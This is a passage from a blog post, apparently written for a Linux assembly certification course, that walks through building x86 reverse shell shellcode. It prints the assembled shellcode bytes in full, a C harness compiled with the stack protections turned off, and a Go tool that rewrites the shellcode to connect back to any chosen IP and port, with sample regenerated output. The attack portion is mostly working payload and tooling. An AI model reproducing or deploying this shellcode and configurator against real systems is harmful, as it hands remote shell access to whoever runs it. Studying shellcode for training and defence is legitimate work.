data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">root@kali:~\/slae\/assignments\/assignment-2# nasm -f elf32 -o reverse_shell.o reverse_shell.nasm\nroot@kali:~\/slae\/assignments\/assignment-2# ld -o reverse_shell_x86 reverse_shell.o\nroot@kali:~\/slae\/assignments\/assignment-2# file reverse_shell_x86\nreverse_shell_x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped\n<\/pre>\n\n\n\n<p>The ouput is an elf executable. We can extract the shellcode using the  <a rel=\"noreferrer noopener\" href=\"https:\/\/www.commandlinefu.com\/commands\/view\/6051\/get-all-shellcode-on-binary-file-from-objdump\" target=\"_blank\">Commandlinefu<\/a><\/p>\n\n\n\n<p>The output is a neat shellcode, which can be directly embedded in our shellcode tester program in C. Also, note that the shellcode is free from any null bytes.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"abap\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">root@kali:~\/slae\/assignments\/assignment-2# objdump -d reverse_shell_x86 |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\\t' ' '|sed 's\/ $\/\/g'|sed 's\/ \/\\\\x\/g'|paste -d '' -s |sed 's\/^\/\"\/'|sed 's\/$\/\"\/g'\n\"\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\x31\\xc9\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x31\\xd2\\x89\\xc2\\xb0\\x66\\xb3\\x03\\x31\\xc9\\x68\\x7f\\x00\\x00\\x01\\x66\\x68\\x20\\xfb\\x66\\x6a\\x02\\x89\\xe6\\x6a\\x10\\x56\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80\"<\/pre>\n\n\n\n<p>Our C code looks like this once the shellcode is embedded:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;string.h>\n\nunsigned char code[] = \\\n\"\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\x31\\xc9\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x31\\xd2\\x89\\xc2\\xb0\\x66\\xb3\\x03\\x31\\xc9\\x68\\x7f\\x00\\x00\\x01\\x66\\x68\\x20\\xfb\\x66\\x6a\\x02\\x89\\xe6\\x6a\\x10\\x56\\x52\n\\x89\\xe1\\xcd\\x80\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80\"\n;\n\nmain()\n\n{\n        printf(\"Shellcode length: %d\\n\", strlen(code));\n        int (*ret)() = (int(*)())code;\n        ret();\n}\n<\/pre>\n\n\n\n<p>The final step is to compile this using <em>gcc. <\/em>We need to add <code>fno-stack-protector<\/code> to unprotect the stack and <code>execstack<\/code> to make the stack executable.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"abap\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">root@kali:~\/slae\/assignments\/assignment-2# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\nshellcode.c:7:1: warning: return type defaults to \u2018int\u2019 [-Wimplicit-int]\n    7 | main()\n      | ^~~~<\/pre>\n\n\n\n<p>The reverse shell is ready to be executed. To spawn a reverse shell, run netcat on local machine to listen on port 8443 Then, run the shellcode binary. Reverse shell spawned !!<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"204\" src=\"https:\/\/mosunit.com\/wp-content\/uploads\/2020\/07\/reverse-1024x204.png\" alt=\"\" class=\"wp-image-641\" srcset=\"https:\/\/mosunit.com\/wp-content\/uploads\/2020\/07\/reverse-1024x204.png 1024w, https:\/\/mosunit.com\/wp-content\/uploads\/2020\/07\/reverse-300x60.png 300w, https:\/\/mosunit.com\/wp-content\/uploads\/2020\/07\/reverse-768x153.png 768w, https:\/\/mosunit.com\/wp-content\/uploads\/2020\/07\/reverse.png 1159w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Shellcode with reconfigurable IP and port<\/h2>\n\n\n\n<p>In the last post related to bind shell, I wrote a small code in Go which allowed to configure the port in the bind shell shellcode. In this case, as we are connecting to a remote host to spawn a shell, I have written a small script which allows the shellcode to be reconfigured with IP address and port; based on user&#8217;s input.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"golang\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/*\nTool:\t\tLinux Reverse Shell(x86) Port Configurator\nAuthor:\t\tMohit Suyal (@mosunit)\nStudent ID:\tPA-16521\nBlog:\t\thttps:\/\/mosunit.com\n*\/\n\npackage main\n\nimport (\n\t\"flag\"\n\t\"fmt\"\n\t\"os\"\n\t\"strconv\"\n\t\"strings\"\n)\n\nfunc main() {\n\n\t\/\/original shellcode\n\tshellcode := []string{`\\x31`, `\\xc0`, `\\xb0`, `\\x66`, `\\x31`, `\\xdb`, `\\xb3`, `\\x01`, `\\x31`, `\\xc9`, `\\x51`, `\\x6a`, `\\x01`, `\\x6a`, `\\x02`, `\\x89`, `\\xe1`, `\\xcd`, `\\x80`, `\\x31`, `\\xd2`, `\\x89`, `\\xc2`, `\\xb0`, `\\x66`, `\\xb3`, `\\x03`, `\\x31`, `\\xc9`, `\\x68`, `\\x7f`, `\\x00`, `\\x00`, `\\x01`, `\\x66`, `\\x68`, `\\x20`, `\\xfb`, `\\x66`, `\\x6a`, `\\x02`, `\\x89`, `\\xe6`, `\\x6a`, `\\x10`, `\\x56`, `\\x52`, `\\x89`, `\\xe1`, `\\xcd`, `\\x80`, `\\xb0`, `\\x3f`, `\\x89`, `\\xd3`, `\\x31`, `\\xc9`, `\\xcd`, `\\x80`, `\\xb0`, `\\x3f`, `\\xb1`, `\\x01`, `\\xcd`, `\\x80`, `\\xb0`, `\\x3f`, `\\xb1`, `\\x02`, `\\xcd`, `\\x80`, `\\xb0`, `\\x0b`, `\\x31`, `\\xdb`, `\\x53`, `\\x68`, `\\x6e`, `\\x2f`, `\\x73`, `\\x68`, `\\x68`, `\\x2f`, `\\x2f`, `\\x62`, `\\x69`, `\\x89`, `\\xe3`, `\\x31`, `\\xc9`, `\\x31`, `\\xd2`, `\\xcd`, `\\x80`}\n\n\t\/\/Define flags for input\n\tip := flag.String(\"ip\", \"\", \"remote IP to spawn shell\")\n\tport := flag.Int(\"port\", -1, \"port number to spawn shell on\")\n\tflag.Parse()\n\n\tif *port == -1 || *ip == \"\" {\n\t\tfmt.Println(\"Please input the port number. e.g. 9999 \")\n\t\tflag.PrintDefaults()\n\t\tos.Exit(1)\n\t}\n\n\t\/*\n\t\tCode to change the IP address in the shellcode\n\t*\/\n\n\t\/\/ split the ip address by octects into slice of strings\n\tipslice := strings.Split(*ip, \".\")\n\n\tv := make([]string, 4)\n\n\t\/\/ iterate over each slice element and convert into hex\n\tfor i := range ipslice {\n\n\t\t\/\/ covert the element of string slice to an int\n\t\ts, _ := strconv.Atoi(ipslice[i])\n\n\t\t\/\/ Check if the hex coversion of slice element will be less than 2 digits; append an additional \"0\", if true\n\t\tif s &lt; 16 {\n\t\t\tv[i] = fmt.Sprintf(\"%s%x\", \"\\\\x0\", s)\n\t\t\tcontinue\n\t\t}\n\t\tv[i] = fmt.Sprintf(\"%s%x\", \"\\\\x\", s)\n\t}\n\n\t\/\/ replace the relevant elements of slice to replace the old IP address with a new one\n\tfor i := 0; i &lt;= 3; i++ {\n\t\tshellcode[i+30] = v[i]\n\t}\n\n\t\/*\n\t\tCode to change the port number in the shellcode\n\t*\/\n\n\t\/\/ Code to change the IP address in the shellcode\n\thexport := fmt.Sprintf(\"%x\", *port)\n\n\t\/\/ Create a slice of strings to split the port into two parts\n\tone := make([]string, 4)\n\ttwo := make([]string, 4)\n\n\t\/\/ Create two seperate string slice to store first two and last two characters of the port converted in hex\n\tfor i, r := range hexport {\n\t\tif i &lt; 2 {\n\t\t\tone[i] = string(r)\n\t\t\tcontinue\n\t\t}\n\t\ttwo[i] = string(r)\n\t}\n\n\t\/\/ Join the string of ports to create two equal parts\n\tp1 := strings.Join(one[:], \"\")\n\tp2 := strings.Join(two[:], \"\")\n\n\t\/\/ Change the representation of the ports to hex format\n\tp1 = fmt.Sprintf(\"%s%s\", \"\\\\x\", p1)\n\tp2 = fmt.Sprintf(\"%s%s\", \"\\\\x\", p2)\n\n\t\/\/ Replace the respective values of port in orginal shellcode to new port provided\n\tshellcode[36] = p1\n\tshellcode[37] = p2\n\n\t\/\/ Join the slice of strings and print the shellcode\n\tfmt.Printf(\"Generating TCP reverse shellcode for IP address %v and port number %v\\nThe shellcode length is %v bytes\\n\\n\\\"%s\\\"\", *ip, *port, len(shellcode), strings.Join(shellcode[:], \"\"))\n\n}\n<\/pre>\n\n\n\n<p>The code takes the IP address and port as input. The default shellcode spawned a shell on local system on port 8443. Let&#8217;s generate a new shellcode to spawn the reverse shell on <em>192.168.1.11<\/em> on port <em>9999<\/em><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">PS E:\\&lt;snipped>\\SLAE\\assignment-2> go run .\\reverse_shell_config.go -ip 192.168.1.11 -port 9999\nGenerating TCP reverse shellcode for IP address 192.168.1.11 and port number 9999\nThe shellcode length is 94 bytes\n\n\"\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\x31\\xc9\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x31\\xd2\\x89\\xc2\\xb0\\x66\\xb3\\x03\\x31\\xc9\\x68\\xc0\\xa8\\x01\\x0b\\x66\\x68\\x27\\x0f\\x66\\x6a\\x02\\x89\\xe6\\x6a\\x10\\x56\\x52\\x89\\xe1\\xcd\\x80\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80\"<\/pre>\n\n\n\n<p>Embedd this shellcode in our skeleton C program and execute it. The following output shows the reverse shell being spawned<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"480\" src=\"https:\/\/mosunit.com\/wp-content\/uploads\/2020\/07\/reverse-1-1024x480.png\" alt=\"\" class=\"wp-image-649\" srcset=\"https:\/\/mosunit.com\/wp-content\/uploads\/2020\/07\/reverse-1-1024x480.png 1024w, https:\/\/mosunit.com\/wp-content\/uploads\/2020\/07\/reverse-1-300x141.png 300w, https:\/\/mosunit.com\/wp-content\/uploads\/2020\/07\/reverse-1-768x360.png 768w, https:\/\/mosunit.com\/wp-content\/uploads\/2020\/07\/reverse-1.png 1261w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: <a href=\"https:\/\/www.pentesteracademy.com\/course?id=3\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.pentesteracademy.com\/course?id=3<\/a><\/p>\n\n\n\n<p>Student ID: PA-16521<\/p>\n\n\n\n<p>Thanks for reading !<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In the last post, I covered the walk through of bind shellcode in assembly. In this post, I will work on the same lines and&hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20,8,21,25],"tags":[],"class_list":["post-614","post","type-post","status-publish","format-standard","hentry","category-assembly","category-red-team","category-shellcoding","category-slae"],"_links":{"self":[{"href":"https:\/\/mosunit.com\/index.php?rest_route=\/wp\/v2\/posts\/614","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mosunit.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mosunit.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mosunit.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/mosunit.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=614"}],"version-history":[{"count":28,"href":"https:\/\/mosunit.com\/index.php?rest_route=\/wp\/v2\/posts\/614\/revisions"}],"predecessor-version":[{"id":657,"href":"https:\/\/mosunit.com\/index.php?rest_route=\/wp\/v2\/posts\/614\/revisions\/657"}],"wp:attachment":[{"href":"https:\/\/mosunit.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=614"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mosunit.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=614"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mosunit.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=614"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}